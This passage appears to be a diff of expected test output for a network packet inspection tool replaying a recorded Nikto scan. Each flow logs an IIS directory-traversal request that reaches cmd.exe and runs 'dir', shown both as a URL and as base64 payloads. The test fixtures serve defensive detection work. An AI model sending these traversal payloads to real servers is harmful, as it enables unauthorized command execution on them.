{"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003190)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7580000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_packet_id":1,"flow_last_seen":1576420277870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1576420277870,"pkt":"AAAAAAAAAAAAAAAACABFAADwKqRAAEAGEWJ\/AAABfwAAAcdMH5CrChOaUJIGgIAYAED+5AAAAQEICp1m\/5adZv+WR0VUIC9jZ2ktYmluLy4uJWMwJWFmLi4vLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5MSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01103{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7580000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003191)"}} +01103{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7580000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003191)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_packet_id":1,"flow_last_seen":1576420277871,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"thread_ts_msec":1576420277871,"pkt":"AAAAAAAAAAAAAAAACABFAADnEqJAAEAGKW1\/AAABfwAAAcdOH5CE7yudGG3JzIAYAED+2wAAAQEICp1m\/5edZv+XR0VUIC9paXNhZG1wd2QvLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMTkyKQ0KDQo="} -01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003192)"}} +01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003192)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7580000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1576420277873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_packet_id":1,"flow_last_seen":1576420277873,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"thread_ts_msec":1576420277873,"pkt":"AAAAAAAAAAAAAAAACABFAADuNNpAAEAGBy5\/AAABfwAAAcdQH5AuMg3l88MKY4AYAED+4gAAAQEICp1m\/5mdZv+ZR0VUIC9tc2FkYy8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5MykNCg0K"} -01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7580000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1576420277873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003193)"}} +01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7580000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1576420277873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003193)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7580000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":189,"midstream":1,"thread_ts_msec":1576420277874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_packet_id":1,"flow_last_seen":1576420277874,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1576420277874,"pkt":"AAAAAAAAAAAAAAAACABFAADxWrBAAEAG4VR\/AAABfwAAAcdSH5DZZWOTGgkmxYAYAED+5QAAAQEICp1m\/5qdZv+aR0VUIC9wYnNlcnZlci8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01104{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7580000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":189,"midstream":1,"thread_ts_msec":1576420277874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003194)"}} +01104{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7580000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":189,"midstream":1,"thread_ts_msec":1576420277874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003194)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7580000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277875,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_packet_id":1,"flow_last_seen":1576420277875,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1576420277875,"pkt":"AAAAAAAAAAAAAAAACABFAADs1jZAAEAGZdN\/AAABfwAAAcdUH5CUA+8Kq3ejjIAYAED+4AAAAQEICp1m\/5udZv+bR0VUIC9ycGMvLi4lYzAlYWYuLi8uLiVjMCVhZi4uL3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7580000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277875,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003195)"}} +01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7580000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277875,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003195)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_packet_id":1,"flow_last_seen":1576420277877,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420277877,"pkt":"AAAAAAAAAAAAAAAACABFAADl6fRAAEAGUhx\/AAABfwAAAcdWH5B7VdDQBDmQE4AYAED+2QAAAQEICp1m\/52dZv+dR0VUIC9zY3JpcHRzLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01091{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003196)"}} +01091{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003196)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277878,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_packet_id":1,"flow_last_seen":1576420277878,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420277878,"pkt":"AAAAAAAAAAAAAAAACABFAADltn1AAEAGhZN\/AAABfwAAAcdYH5Dqro9H\/GjzZIAYAED+2QAAAQEICp1m\/56dZv+eR0VUIC9zY3JpcHRzLy4uJWMxJTFjLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01091{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277878,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003197)"}} +01091{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277878,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003197)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7580000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277880,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 